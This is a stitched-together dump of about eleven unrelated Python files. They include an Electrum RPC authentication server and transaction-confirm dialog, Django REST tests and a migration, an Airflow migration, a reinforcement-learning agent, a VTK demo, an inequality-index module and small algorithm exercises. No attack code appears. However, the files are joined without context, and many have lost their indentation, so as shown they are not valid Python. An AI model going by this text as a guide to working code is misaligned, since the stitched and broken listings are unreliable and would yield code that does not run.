#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from base64 import b64decode
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
import time
from . import util
from .logs import logs
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(self):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(self):
try:
self.server.authenticate(self.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
self.send_error(401, str(e))
except Exception as e:
logs.root.exception("")
self.send_error(500, str(e))
return False
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, *args, rpc_user, rpc_password, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
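# Illustrative client-side counterpart (hypothetical snippet, not part of
# Electrum): the server above expects a standard HTTP Basic header, e.g.
#
#   from base64 import b64encode
#   creds = b64encode(b'myuser:mypassword').decode('ascii')
#   headers = {'Authorization': 'Basic ' + creds}
#
# authenticate() then base64-decodes the header, splits on the first ':',
# and compares both halves with util.constant_time_compare (plus a short
# sleep on failure) to avoid leaking information through timing.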
|
from sympy.ntheory import totient
from sys import setrecursionlimit
setrecursionlimit(2000)
def tetrate_mod_n(base, exponent, modulo):
    """Power tower of `base` of height `exponent`, mod `modulo`.

    Reduces the tower via Euler's theorem, which assumes
    gcd(base, modulo) == 1 at every level of the recursion.
    """
    if exponent == 2:
        return pow(base, base, modulo)
    # The top of the tower can be reduced modulo phi(modulo).
    tot = totient(modulo)
    e = tetrate_mod_n(base, exponent - 1, tot)
    return pow(base, e, modulo)
print(tetrate_mod_n(1777, 1855, 10**8))
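# Sanity check (illustrative): for a small case with gcd(base, modulo) == 1,
# the totient reduction must agree with direct modular exponentiation.
assert tetrate_mod_n(7, 3, 100) == pow(7, 7**7, 100)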
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@kudlanov.com',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@kudlanov.com',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating a new tag with invalid payload"""
payload = {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Coriander eggs on toast',
time_minutes=10,
price=5.00,
user=self.user
)
recipe.tags.add(tag1)
res = self.client.get(TAGS_URL, {'assigned_only': 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Pancakes',
time_minutes=5,
price=3.00,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=3,
price=2.00,
user=self.user
)
recipe2.tags.add(tag)
res = self.client.get(TAGS_URL, {'assigned_only': 1})
self.assertEqual(len(res.data), 1)
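# The tests above assume a viewset roughly like the following sketch
# (hypothetical; the real implementation lives in the recipe app's views):
#
#   class TagViewSet(viewsets.GenericViewSet, mixins.ListModelMixin,
#                    mixins.CreateModelMixin):
#       authentication_classes = (TokenAuthentication,)
#       permission_classes = (IsAuthenticated,)
#       queryset = Tag.objects.all()
#       serializer_class = TagSerializer
#
#       def get_queryset(self):
#           queryset = self.queryset
#           if bool(int(self.request.query_params.get('assigned_only', 0))):
#               queryset = queryset.filter(recipe__isnull=False)
#           return queryset.filter(
#               user=self.request.user).order_by('-name').distinct()
#
#       def perform_create(self, serializer):
#           serializer.save(user=self.request.user)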
|
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.distributions import Categorical
import copy
import gym
import environment # lgtm[py/unused-import]
import pyBaba
from tensorboardX import SummaryWriter
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
env = gym.make('baba-volcano-v0')
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
self.conv1 = nn.Conv2d(pyBaba.Preprocess.TENSOR_DIM, 128, 3, padding=1)
self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
self.conv3 = nn.Conv2d(128, 128, 3, padding=1)
self.conv4 = nn.Conv2d(128, 128, 3, padding=1)
self.conv5 = nn.Conv2d(128, 1, 1, padding=0)
self.fc = nn.Linear(594, 4)
self.log_probs = []
self.rewards = []
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = F.relu(self.conv5(x))
x = x.view(x.data.size(0), -1)
x = self.fc(x)
return F.softmax(x, dim=1)
net = Network().to(device)
opt = optim.Adam(net.parameters(), lr=1e-3)
def get_action(state):
state = torch.tensor(state).to(device)
policy = net(state)
m = Categorical(policy)
action = m.sample()
net.log_probs.append(m.log_prob(action))
return env.action_space[action.item()]
def train():
    R = 0
    loss = []
    returns = []
    # Compute discounted returns by iterating the episode rewards backwards.
    for r in net.rewards[::-1]:
        R = r + 0.99 * R
        returns.insert(0, R)
    returns = torch.tensor(returns)
    # Normalize the returns (a simple baseline) to reduce gradient variance.
    returns = (returns - returns.mean()) / (returns.std() + 1e-5)
    # REINFORCE loss: -log pi(a|s) * return, summed over the episode.
    for prob, R in zip(net.log_probs, returns):
        loss.append(-prob * R)
    opt.zero_grad()
    loss = torch.cat(loss).sum()
    loss.backward()
    opt.step()
    del net.log_probs[:]
    del net.rewards[:]
if __name__ == '__main__':
writer = SummaryWriter()
global_step = 0
for e in range(10000):
score = 0
state = env.reset().reshape(1, -1, 18, 33)
step = 0
while step < 200:
global_step += 1
action = get_action(state)
env.render()
next_state, reward, done, _ = env.step(action)
next_state = next_state.reshape(1, -1, 18, 33)
net.rewards.append(reward)
score += reward
state = copy.deepcopy(next_state)
step += 1
            if done:
break
train()
writer.add_scalar('Reward', score, e)
writer.add_scalar('Step', step, e)
print(
f'Episode {e}: score: {score:.3f} time_step: {global_step} step: {step}')
|
#!/usr/bin/env python
# noinspection PyUnresolvedReferences
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.vtkCommonColor import vtkNamedColors
from vtkmodules.vtkCommonDataModel import vtkPolyData
from vtkmodules.vtkFiltersSources import (
vtkPointSource,
vtkSphereSource
)
from vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkGlyph3DMapper,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer
)
def main():
colors = vtkNamedColors()
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName('InteractorStyleTrackballCamera')
# create a renderwindowinteractor
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
style = vtkInteractorStyleTrackballCamera()
iren.SetInteractorStyle(style)
# create source
src = vtkPointSource()
src.SetCenter(0, 0, 0)
src.SetNumberOfPoints(50)
src.SetRadius(5)
src.Update()
actor = point_to_glyph(src.GetOutput().GetPoints(), 0.05)
actor.GetProperty().SetColor(colors.GetColor3d('Gold'))
# assign actor to the renderer
ren.AddActor(actor)
    ren.SetBackground(colors.GetColor3d('RoyalBlue'))
# enable user interface interactor
iren.Initialize()
renWin.Render()
iren.Start()
def point_to_glyph(points, scale):
"""
Convert points to glyphs.
:param points: The points to glyph.
:param scale: The scale, used to determine the size of the
glyph representing the point, expressed as a
fraction of the largest side of the bounding
box surrounding the points. e.g. 0.05
:return: The actor.
"""
bounds = points.GetBounds()
max_len = 0.0
for i in range(0, 3):
max_len = max(bounds[i + 1] - bounds[i], max_len)
sphere_source = vtkSphereSource()
sphere_source.SetRadius(scale * max_len)
pd = vtkPolyData()
pd.SetPoints(points)
mapper = vtkGlyph3DMapper()
mapper.SetInputData(pd)
mapper.SetSourceConnection(sphere_source.GetOutputPort())
mapper.ScalarVisibilityOff()
mapper.ScalingOff()
actor = vtkActor()
actor.SetMapper(mapper)
return actor
if __name__ == '__main__':
main()
|
# flake8: noqa
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""add max tries column to task instance
Revision ID: cc1e65623dc7
Revises: 127d2bf2dfa7
Create Date: 2017-06-19 16:53:12.851141
"""
from alembic import op
import sqlalchemy as sa
from airflow import settings
from airflow.models import DagBag
from sqlalchemy import Column, Integer, String
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.ext.declarative import declarative_base
# revision identifiers, used by Alembic.
revision = 'cc1e65623dc7'
down_revision = '127d2bf2dfa7'
branch_labels = None
depends_on = None
Base = declarative_base()
BATCH_SIZE = 5000
ID_LEN = 250
class TaskInstance(Base):
__tablename__ = "task_instance"
task_id = Column(String(ID_LEN), primary_key=True)
dag_id = Column(String(ID_LEN), primary_key=True)
execution_date = Column(sa.DateTime, primary_key=True)
max_tries = Column(Integer)
try_number = Column(Integer, default=0)
def upgrade():
op.add_column('task_instance', sa.Column('max_tries', sa.Integer, server_default="-1"))
    # Check that the task_instance table exists before the data migration.
    # This check is needed for databases that do not create tables until
    # the migration finishes; checking that the table exists prevents
    # errors from querying a non-existent task_instance table.
connection = op.get_bind()
inspector = Inspector.from_engine(connection)
tables = inspector.get_table_names()
if 'task_instance' in tables:
# Get current session
sessionmaker = sa.orm.sessionmaker()
session = sessionmaker(bind=connection)
dagbag = DagBag(settings.DAGS_FOLDER)
query = session.query(sa.func.count(TaskInstance.max_tries)).filter(
TaskInstance.max_tries == -1
)
        # Query the db in batches to avoid loading the entire table
        # into memory and causing an out-of-memory error.
while query.scalar():
tis = session.query(TaskInstance).filter(
TaskInstance.max_tries == -1
).limit(BATCH_SIZE).all()
for ti in tis:
dag = dagbag.get_dag(ti.dag_id)
if not dag or not dag.has_task(ti.task_id):
                    # The task_instance table might not have up-to-date
                    # information, i.e. the dag or task might have been
                    # modified or deleted from the dagbag but still be
                    # reflected in the task_instance table. In that case,
                    # do not retry tasks that can no longer be parsed.
ti.max_tries = ti.try_number
else:
task = dag.get_task(ti.task_id)
if task.retries:
ti.max_tries = task.retries
else:
ti.max_tries = ti.try_number
session.merge(ti)
session.commit()
# Commit the current session.
session.commit()
def downgrade():
engine = settings.engine
if engine.dialect.has_table(engine, 'task_instance'):
connection = op.get_bind()
sessionmaker = sa.orm.sessionmaker()
session = sessionmaker(bind=connection)
dagbag = DagBag(settings.DAGS_FOLDER)
query = session.query(sa.func.count(TaskInstance.max_tries)).filter(
TaskInstance.max_tries != -1
)
while query.scalar():
tis = session.query(TaskInstance).filter(
TaskInstance.max_tries != -1
).limit(BATCH_SIZE).all()
for ti in tis:
dag = dagbag.get_dag(ti.dag_id)
if not dag or not dag.has_task(ti.task_id):
ti.try_number = 0
else:
task = dag.get_task(ti.task_id)
                    # max_tries - try_number is the number of retries the
                    # task instance has left. So the current try_number
                    # should be the maximum number of self-retries
                    # (task.retries) minus the number of tries the task
                    # instance still had left.
ti.try_number = max(0, task.retries - (ti.max_tries -
ti.try_number))
ti.max_tries = -1
session.merge(ti)
session.commit()
session.commit()
op.drop_column('task_instance', 'max_tries')
|
import unittest
from unittest import TestCase
from sqlalchemy.orm.exc import MultipleResultsFound
from wopmars.tests.resource.model.FooBase import FooBase
from wopmars.SQLManager import SQLManager
from wopmars.utils.OptionManager import OptionManager
class TestWopmarsSession(TestCase):
def setUp(self):
        OptionManager.initial_test_setup()  # Set test arguments
        SQLManager.instance().create_all()  # Create database with tables
self.__session = SQLManager.instance().get_session()
def tearDown(self):
self.__session.rollback()
SQLManager.instance().get_session().close()
SQLManager.instance().drop_all()
OptionManager._drop()
SQLManager._drop()
def test_commit_query_add(self):
for i in range(10):
f = FooBase(name="testSession " + str(i))
self.__session.add(f)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
def test_rollback(self):
for i in range(10):
f = FooBase(name="testSession " + str(i))
self.__session.add(f)
self.__session.rollback()
self.assertEqual(len(self.__session.query(FooBase).all()), 0)
def test_add_all(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
def test_delete(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
for i in range(5):
f = self.__session.query(FooBase).filter(FooBase.name == "testSession " + str(i)).first()
self.__session.delete(f)
self.assertEqual(len(self.__session.query(FooBase).all()), 5)
def test_delete_content(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.__session.delete_content(FooBase)
self.assertEqual(len(self.__session.query(FooBase).all()), 0)
def test_something(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.assertTrue(self.__session.something())
self.__session.commit()
self.assertFalse(self.__session.something())
for i in range(10):
self.__session.query(FooBase).filter(FooBase.name == "testSession " + str(i)).first().name = "sessionTest " + str(i)
self.assertTrue(self.__session.something())
def test_get_or_create(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(self.__session.get_or_create(FooBase, name="testSession 0")[0], fs[0])
self.__session.delete(fs[0])
self.assertNotEqual(self.__session.get_or_create(FooBase, name="testSession 0")[0], fs[0])
def test_query(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
with self.assertRaises(MultipleResultsFound):
self.assertEqual(self.__session.query(FooBase).one().name, "testSession 0")
self.assertEqual(self.__session.query(FooBase).filter(FooBase.name == "testSession 0").one().name, "testSession 0")
self.assertEqual(self.__session.query(FooBase).count(), 10)
self.assertEqual(self.__session.query(FooBase).first().name, "testSession 0")
self.assertIsNone(self.__session.query(FooBase).filter(FooBase.name == "existepas").one_or_none())
self.assertIsNone(self.__session.query(FooBase).filter(FooBase.name == "existepas").scalar())
self.assertEqual(self.__session.query(FooBase.name).filter(FooBase.name == "testSession 0").scalar(), "testSession 0")
with self.assertRaises(MultipleResultsFound):
self.assertEqual(self.__session.query(FooBase.name).scalar(), "testSession 0")
if __name__ == '__main__':
unittest.main()
|
import numpy as np
def ede(a, epsilon = 0.5, weights = None):
"""
Compute the Atkinson Equally-Distributed Equivalent.
The Atkinson EDE and Index are only suitable for distributions of desirable
quantities (where having more of the quantity is desirable), e.g., income.
Parameters
----------
a : array_like
1-D array containing the values of the distribution.
    epsilon : float
        The inequality aversion parameter; epsilon > 0 and, for this
        implementation, epsilon != 1.
weights : array_like, optional
1-D array of integer weights associated with the values in `a`. Each value in
`a` contributes to the average according to its associated weight.
If `weights=None`, then all data in `a` are assumed to have a
weight equal to one.
Returns
-------
value : float
Returns the Atkinson EDE of the distribution provided.
"""
    if weights is None:
        N = len(a)
    else:
        N = weights.sum()
    # Note: the formula below is undefined at epsilon == 1 (the EDE limit
    # there is the weighted geometric mean), hence the epsilon != 1 caveat.
    sum_atk = 0
    count = 0
    for i in a:
        if weights is None:
            sum_atk += i**(1 - epsilon)
        else:
            sum_atk += (i**(1 - epsilon)) * weights[count]
        count += 1
    return (sum_atk / N)**(1 / (1 - epsilon))
def index(a, epsilon = 0.5, weights = None):
"""
Compute the Atkinson Index.
The Atkinson EDE and Index are only suitable for distributions of desirable
quantities (where having more of the quantity is desirable), e.g., income.
Parameters
----------
a : array_like
1-D array containing the values of the distribution.
    epsilon : float
        The inequality aversion parameter; epsilon > 0 and, for this
        implementation, epsilon != 1.
weights : array_like, optional
1-D array of integer weights associated with the values in `a`. Each value in
`a` contributes to the average according to its associated weight.
If `weights=None`, then all data in `a` are assumed to have a
weight equal to one.
Returns
-------
value : float
Returns the Atkinson Index of the distribution provided.
"""
    ede_atk = ede(a, epsilon, weights)
    x_mean = np.average(a, weights=weights)
    return 1 - (ede_atk / x_mean)
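if __name__ == "__main__":
    # Quick illustration with made-up incomes: a perfectly equal
    # distribution has an EDE equal to its mean and an Atkinson Index of 0,
    # while inequality pushes the EDE below the mean and the index above 0.
    equal = np.array([10.0, 10.0, 10.0])
    unequal = np.array([1.0, 10.0, 19.0])
    print(ede(equal), index(equal))      # 10.0 0.0
    print(ede(unequal), index(unequal))  # EDE < 10, index > 0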
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (2019) The Electrum Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from typing import TYPE_CHECKING, Optional
import copy
from PyQt5.QtCore import Qt, QSize
from PyQt5.QtGui import QTextCharFormat, QBrush, QFont
from PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QLabel, QGridLayout, QPushButton, QWidget, QTextEdit, QLineEdit, QCheckBox
from electrum.i18n import _
from electrum.util import quantize_feerate, NotEnoughFunds, NoDynamicFeeEstimates
from electrum.plugin import run_hook
from electrum.transaction import TxOutput, Transaction
from electrum.simple_config import SimpleConfig, FEERATE_WARNING_HIGH_FEE
from electrum.wallet import InternalAddressCorruption
from .util import WindowModalDialog, ButtonsLineEdit, ColorScheme, Buttons, CloseButton, FromList, HelpLabel, read_QIcon, char_width_in_lineedit, CancelButton, OkButton
from .util import MONOSPACE_FONT
from .fee_slider import FeeSlider
from .history_list import HistoryList, HistoryModel
from .qrtextedit import ShowQRTextEdit
if TYPE_CHECKING:
from .main_window import ElectrumWindow
class TxEditor:
def __init__(self, window: 'ElectrumWindow', make_tx, output_value, is_sweep):
self.main_window = window
self.make_tx = make_tx
self.output_value = output_value
self.tx = None # type: Optional[Transaction]
self.config = window.config
self.wallet = window.wallet
self.not_enough_funds = False
self.no_dynfee_estimates = False
self.needs_update = False
self.password_required = self.wallet.has_keystore_encryption() and not is_sweep
self.main_window.gui_object.timer.timeout.connect(self.timer_actions)
def timer_actions(self):
if self.needs_update:
self.update_tx()
self.update()
self.needs_update = False
def fee_slider_callback(self, dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.needs_update = True
def get_fee_estimator(self):
return None
def update_tx(self):
fee_estimator = self.get_fee_estimator()
try:
self.tx = self.make_tx(fee_estimator)
self.not_enough_funds = False
self.no_dynfee_estimates = False
except NotEnoughFunds:
self.not_enough_funds = True
self.tx = None
return
except NoDynamicFeeEstimates:
self.no_dynfee_estimates = True
self.tx = None
try:
self.tx = self.make_tx(0)
except BaseException:
return
except InternalAddressCorruption as e:
self.tx = None
self.main_window.show_error(str(e))
raise
except BaseException as e:
self.tx = None
self.main_window.logger.exception('')
self.show_message(str(e))
return
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
self.tx.set_rbf(True)
class ConfirmTxDialog(TxEditor, WindowModalDialog):
# set fee and return password (after pw check)
def __init__(self, window: 'ElectrumWindow', make_tx, output_value, is_sweep):
TxEditor.__init__(self, window, make_tx, output_value, is_sweep)
WindowModalDialog.__init__(self, window, _("Confirm Transaction"))
vbox = QVBoxLayout()
self.setLayout(vbox)
grid = QGridLayout()
vbox.addLayout(grid)
self.amount_label = QLabel('')
grid.addWidget(QLabel(_("Amount to be sent") + ": "), 0, 0)
grid.addWidget(self.amount_label, 0, 1)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_label = QLabel('')
grid.addWidget(HelpLabel(_("Mining fee") + ": ", msg), 1, 0)
grid.addWidget(self.fee_label, 1, 1)
self.extra_fee_label = QLabel(_("Additional fees") + ": ")
self.extra_fee_label.setVisible(False)
self.extra_fee_value = QLabel('')
self.extra_fee_value.setVisible(False)
grid.addWidget(self.extra_fee_label, 2, 0)
grid.addWidget(self.extra_fee_value, 2, 1)
self.fee_slider = FeeSlider(self, self.config, self.fee_slider_callback)
self.fee_slider.reinitialize()
grid.addWidget(self.fee_slider, 5, 1)
self.message_label = QLabel(self.default_message())
grid.addWidget(self.message_label, 6, 0, 1, -1)
self.pw_label = QLabel(_('Password'))
self.pw_label.setVisible(self.password_required)
self.pw = QLineEdit()
        self.pw.setEchoMode(2)  # 2 == QLineEdit.Password
self.pw.setVisible(self.password_required)
grid.addWidget(self.pw_label, 8, 0)
grid.addWidget(self.pw, 8, 1, 1, -1)
self.preview_button = QPushButton(_('Advanced'))
self.preview_button.clicked.connect(self.on_preview)
grid.addWidget(self.preview_button, 0, 2)
self.send_button = QPushButton(_('Send'))
self.send_button.clicked.connect(self.on_send)
self.send_button.setDefault(True)
vbox.addLayout(Buttons(CancelButton(self), self.send_button))
self.update_tx()
self.update()
self.is_send = False
def default_message(self):
return _('Enter your password to proceed') if self.password_required else _('Click Send to proceed')
def on_preview(self):
self.accept()
def run(self):
cancelled = not self.exec_()
password = self.pw.text() or None
return cancelled, self.is_send, password, self.tx
def on_send(self):
password = self.pw.text() or None
if self.password_required:
if password is None:
return
try:
self.wallet.check_password(password)
except Exception as e:
self.main_window.show_error(str(e), parent=self)
return
self.is_send = True
self.accept()
def disable(self, reason):
self.message_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
self.message_label.setText(reason)
self.pw.setEnabled(False)
self.send_button.setEnabled(False)
def enable(self):
self.message_label.setStyleSheet(None)
self.message_label.setText(self.default_message())
self.pw.setEnabled(True)
self.send_button.setEnabled(True)
def update(self):
tx = self.tx
amount = tx.output_value() if self.output_value == '!' else self.output_value
self.amount_label.setText(self.main_window.format_amount_and_units(amount))
if self.not_enough_funds:
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.main_window.format_amount(c + u + x).strip(), self.main_window.base_unit(), _("are frozen")
)
self.disable(text)
return
if not tx:
return
fee = tx.get_fee()
self.fee_label.setText(self.main_window.format_amount_and_units(fee))
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
self.extra_fee_label.setVisible(True)
self.extra_fee_value.setVisible(True)
self.extra_fee_value.setText(self.main_window.format_amount_and_units(x_fee_amount))
feerate_warning = FEERATE_WARNING_HIGH_FEE
low_fee = fee < self.wallet.relayfee() * tx.estimated_size() / 1000
high_fee = fee > feerate_warning * tx.estimated_size() / 1000
if low_fee:
msg = '\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
])
self.disable(msg)
elif high_fee:
self.disable(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
else:
self.enable()
|
'''
You are a professional robber planning to rob houses along a street.
Each house has a certain amount of money stashed; the only constraint
stopping you from robbing each of them is that adjacent houses have
security systems connected, which will automatically contact the
police if two adjacent houses are broken into on the same night.
Given a list of non-negative integers representing the amount of
money in each house, determine the maximum amount of money you can
rob tonight without alerting the police.
Example 1:
Input: [1,2,3,1]
Output: 4
Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).
Total amount you can rob = 1 + 3 = 4.
Example 2:
Input: [2,7,9,3,1]
Output: 12
Explanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).
Total amount you can rob = 2 + 9 + 1 = 12.
'''
class Solution:
def rob(self, nums) -> int:
n = len(nums)
if n == 0:
return 0
dp = [0] * (n+1)
dp[1] = nums[0]
for i in range(2, n+1):
dp[i] = max(nums[i-1]+dp[i-2], dp[i-1])
return dp[-1]
print(Solution().rob([2,7,9,3,1]))
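# Equivalent constant-space variant (illustrative): since dp[i] only depends
# on dp[i-1] and dp[i-2], two rolling values suffice.
def rob_constant_space(nums) -> int:
    prev, curr = 0, 0
    for x in nums:
        prev, curr = curr, max(curr, prev + x)
    return curr

print(rob_constant_space([2, 7, 9, 3, 1]))  # 12, same as above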
|
# Generated by Django 2.2.6 on 2020-11-06 09:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0010_auto_20201103_2339'),
]
operations = [
migrations.AlterModelOptions(
name='group',
options={'ordering': ('title',), 'verbose_name': 'Группа', 'verbose_name_plural': 'Группы'},
),
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-pub_date',), 'verbose_name': 'Пост', 'verbose_name_plural': 'Посты'},
),
]
|
# ----------------------------------------------------------------------------
